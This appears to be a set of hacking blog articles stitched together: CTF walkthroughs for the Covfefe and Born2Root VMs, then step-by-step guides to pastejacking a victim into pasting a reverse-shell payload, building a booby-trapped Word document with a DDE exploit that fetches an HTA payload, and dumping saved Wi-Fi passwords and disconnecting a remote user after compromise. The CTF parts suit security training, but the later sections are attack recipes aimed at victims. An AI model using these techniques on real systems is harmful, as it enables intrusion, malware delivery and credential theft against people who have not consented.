Hack the Covfefe VM (CTF Challenge)

Today we are going to take on another challenge known as “covfefe” .IT is a Debian 9 based Boot to root VM, originally created as a CTF for SecTalks_BNE. The author of this VM is “Tim Kent”.   We have to find 3 flags to complete the challenge.

You can download this VM:  https://download.vulnhub.com/covfefe/covfefe.ova

Security Level: Beginner

Penetrating Methodology:

Scanning

·         Netdiscover

·         NMAP

Enumeration

·         Web spidering

·         Directory enumeration

Exploiting

·         Ssh login

·         John

Privilege Escalation

·         Exploiting SUID Executables

Capture the Flag

Walkthrough

Scanning

Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP as 192.168.1.101.

netdiscover

Time to scan the Target’s IP with Nmap.

nmap -A 192.168.1.101

As you can see in following screenshot that port 22 ,80 and 31337 are open.

Enumeration

Browsing the IP with HTTP port 31337 doesn’t give any result.

Directory enumeration using dirb shows two interesting directories “/.ssh” and “/.robots.txt”. Nmap scan has earlier shown robots.txt as well but to dig dipper we went with dirb.

dirb http://192.168.1.101:31337/

Further enumeration of robots.txt using curl shows a file “/taxes” among others. And as soon as we open it, we get our first flag.

curl http:// 192.168.1.101:31337/robots.txt

On browsing 192.168.1.101:31337/.ssh we find ssh private and public key respectively as ‘id_rsa’ and ‘id_rsa.pub’ & authorized_keys.

We get a download prompt while opening ‘authorized_keys’ in the browser so we download it. We downloaded id_rsa too in the same way.

When we open authorized_keys we find a username ‘simon’ for the private key.

cat authorized_keys

Exploiting

Now we use the private key to connect to the VM through ssh. But it is asking for a passphrase here.

ssh -i id_rsa simon@192.168.1.101

We have to change its format, which can be done using a john utility called “ssh2john”. It will convert ‘ id_rsa’  to a hash format recognized by johntheripper. Now let’s use John the Ripper to crack this hash.

chmod 777 ssh2john.py

python ssh2john.py id_rsa > hash

john hash –show

We find that passphrase of the key is starwars. Now we use this passphrase along with the key to connect through ssh. 

After successful ssh login using our newly acquired passphrase, we search for the SUID binaries.

ssh -i id_rsa simon@192.168.1.101

find / -perm -u=s -type f 2>/dev/null

Here we notice ‘usr/local/bin/read_message” that takes the user input and displays a message. We provide ‘simon’ as username when asked. There is a hint for username inside the message. It should be ‘Simon’ instead of ‘simon’.

usr/local/bin/read_message

Privilege Escalation

Again when we open ‘read_message’  and provide ‘Simon’ as username,  we get a message with  a hint that we can find  something in root. Now when we enter the ‘/root’ folder and list its content we find two files named ‘flag.txt’ and ‘read_message.c’. We can’t access flag.txt yet. Moving on, inside ‘read_message’  we find our second flag.

cd /root

ls

cat flag.txt

cat read_meassage.c

In above screenshot reading through the source code we find that, when we enter a string it reads the first 5 characters of the string as Simon, if it matches then it runs /usr/local/sbin/message. But the input allocation for this is 20 bytes. So, we have to overflow the stack entering more than 20 bytes of data. We use the first 5 char to be ‘Simon’ followed by 15 ‘A’ and then ‘/bin/sh’ at the 21^st byte.

read_message

SimonAAAAAAAAAAAAAAA/bin/sh

cd /root

ls

cat flag.txt

As soon as we provide this string, we spawn a shell as root. Now we can access flag.txt. Finally, we found the third flag.

Exploiting Remote machine with Pastejacking

Pastejacking is a technique that takes over the clipboard of a machine, for instance, when we copy text from a website, that text can be riddled with malicious code that will execute when you paste that text. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is; copy some harmless words from the browser and paste them on the command prompt and that’s it, session!!

We are going to walk you through the process, using a tool called PasteZort

Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from you Kali terminal, navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will make a PasteZort folder on your desktop with the tool in it.

Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.

In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing file as program”.

Navigate to the PasteZort folder from the Kali terminal, now execute the tool using “python ./PasteZOrt.py”. Your tool is now running.

Now we can get started making our pastejacking payload using the tools interphase. We will be making a windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.

After that, again choose option “1” under “Select Payload” to generate a windows reverse tcp shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”

You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.

And that’s it, your payload is ready.

You will now be asked to if you would like to turn on Handler, type “Y” and press enter

Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.

Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

Hack the Born2Root VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Born2Root. The credit for making this vm machine goes to “Hadi Mene” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.137 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.137

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.104/

Now the dirb scan shows us directories. We open the icons/ directory and find few files.

Among the files there is a text file we open it and find a private key.

We use this key to login through ssh to the target machine we use the names we find on the page we first opened. First we change the permissions of the private key. Then we use it to connect through ssh.

chmod 600 id_rsa

ssh -i id_rsa martin@192.168.1.137

When we connect it will ask for password just press enter, it is there for trolling.

Searching through the files we take a look at cron job.

cat /etc/crontab

We find that a file to called sekurity.py in the /tmp/ is to be executed every 5 minutes. But the file is missing from the folder. So we create a reverse shell of our own and save it as sekurity.py in the /tmp/ folder.

Now we set up our listener using netcat and wait for the cronjob to execute our file. Once the file is executed we get our reverse shell as a different user.

We couldn’t find anything that could help us root the machine. Now we use the third the user to root the machine. We know that the third user is hadi. So we create a dictionary using this name.

We use cupp to create a dictionary.

After we create a dictionary we use metasploit to bruteforce our way into ssh.

msf > use auxiliary/scanner/ssh/ssh_login

msf(ssh_login) > set rhosts 192.168.1.137

msf(ssh_login > set username hadi

msf(ssh_login > set pass_file hadi.txt

msf(ssh_login > run

Now once we enter the shell we spawn the terminal and use hadi’s password (‘hadi123’) to enter the root shell.

python -c “import pty; pty.spawn(‘/bin/bash’)”

su - root

Now that we are root we open the flag.txt and find a congratulatory message for completing the VM challenge.

Exploiting Windows Machine with DDE Exploit

DDE stands for “dynamic Data Exchange”, this is a method used by windows to facilitate one program being able to subscribe to an item made using another program. This exploit uses that functionality to exploit the victim endpoint. Once the victim clicks on the word file, a HTA payload is retrieved via HTTP and session is achieved.

Here is a step-by-step depiction of how it happens:

The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension, you can name it anything you like, to avoid any confusion, ours is names “dde_delivery.rb”. This file has to now be moved into the windows section of the exploit folder in Metasploit, you can find the path and exploit URL below.

Exploit URL - https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Path of windows folder in Kali – usr > share > metasploit-framework > modules > exploits > windows

Here is what the exploit being pasted into the “windows” folder will look like.

Now open terminal and start Metasploit, once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. Once that is done, all you need to do is set srvhost, this is the host IP. Once the exploit loads, type “set srvhost” followed by your IP, you can see what that would look like in the screenshot given below.

Press enter and you’re all set.

Type “exploit” and press Enter.

You will see a code generated, it has been highlighted in the screenshot given below. Copy this code.

NOTE: Do not close the terminal, it must remain active throughout.

Open Microsoft Word, navigate to the “Insert” tab, under the “Text” section you will find “Quick Parts”, click on it and in the drop menu you will see “Field…”

Click on “Field…”, another windows will appear, by default it will look like the screenshot pasted below, click OK

Once you click on OK, a text will appear “!Unexpected End of Formula”, select this text and right click on it, in the menu choose option “Toggle Field Codes”.

Once this is done, the text will change to “{  =\* MERGEFORMAT } “

Paste the code you copied from Metasploit within the “{ }”, as seen below.

Save the file in a “.docx” format, you can name it anything you like and close Microsoft Word.

You now have a handy word file that can be opened on a Windows 10 machine to achieve session.

Here is what it looks like when the word file is opened:

Once the word file is opened, you will see the following message, click “Yes”.

Next this message will appear. Again, click “Yes”

Finally this message will appear, click “OK”

Now go back to the terminal in kali for the good part.

You will see that the moment OK is clicked in the image above, Meterpreter will come online and you will have achieved session just like that!!

If in case you were wondering why at the beginning we made you manually copy the code into Leafpad and save it into Metasploit, it’s because this is a new exploit and has not been updated into the Metasploit database.

Have fun and stay ethical. 

Wifi Post Exploitation on Remote PC

Most of the Security protocols of Wi-Fi networks are often broken or bypassed exposing the wireless internet traffic to attackers. Through this article one can learn about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too. All the following attacks are post exploitation attacks.

Table of Content

• Introduction
• Working of Wi-Fi
• Types of Wi-Fi security
• WLAN BSS List
• WLAN Current Connection
• WLAN Profile
• WLAN Disconnect
• Mimikatz
• Netsh

Introduction

All the wireless networking technology are commonly known as Wi-Fi. It provides high speed internet as it works on radio waves. Wi-Fi trademark is owned by the company the Wi-Fi Alliance; it officially defined as Wireless Local Area Network (WLAN). It is supported by many applications and devices such as mobile phones, PSAs, OS, Video game consoles, etc. therefore, it lets all the devices to communicate easily.

Working of Wi-Fi

As the name suggests, Wi-Fi network has no physical connection between sender and receiver. It uses radio frequency within the electromagnetic spectrum associated with radio waves. Therefore, it is able to provided high speed internet. Every Wi-Fi connection works through a Access Point (AP). The main job of an access point is to broadcast the signal that is further detected by electronic devices. ones the signal is detected they connect to the Wi-Fi in order to use Wi-Fi.

Types of Wi-Fi security

• Wired Equivalent Privacy
• Wi-Fi Protected Access
• Wi-Fi protected Access 2

Netsh

Now that you have session of the victim’s PC, go to the shell and use the following command to find out the wi-fi connections of victims’ PC over the time ;

netsh wlan show profiles

Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you SSID and other important  information regarding wireless connection.

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

As the above image shows, till date the PC was connected to the Pentest Lab, Sinos, POCO PHONE, ignit. Now, we can use the following to gain the detailed information about the network :

netsh wlan show networks mode=bssid

Now, use the following command to see the password of a particular wi-fi :

netsh wlan show profile name=”ignit” key=clear

Get current Wi-Fi connection information of a remote user

This module gathers information about the current connection on each wireless lan interface on the target machine.

msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

Get saved wireless LAN profile of a remote user

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

Disconnect a remote user’s Wi-Fi connection

This module disconnects the current wireless network connection on the specified interface.

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_disconnect) > set session 5

msf post(wlan_disconnect) > exploit

Other Way

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

meterpreter > load kiwi

meterpreter > help

this will give you entire wireless connection list with passwords as well.  VOILA! You got it right.

meterpreter > wifi_list

meterpreter > wifi_list_shared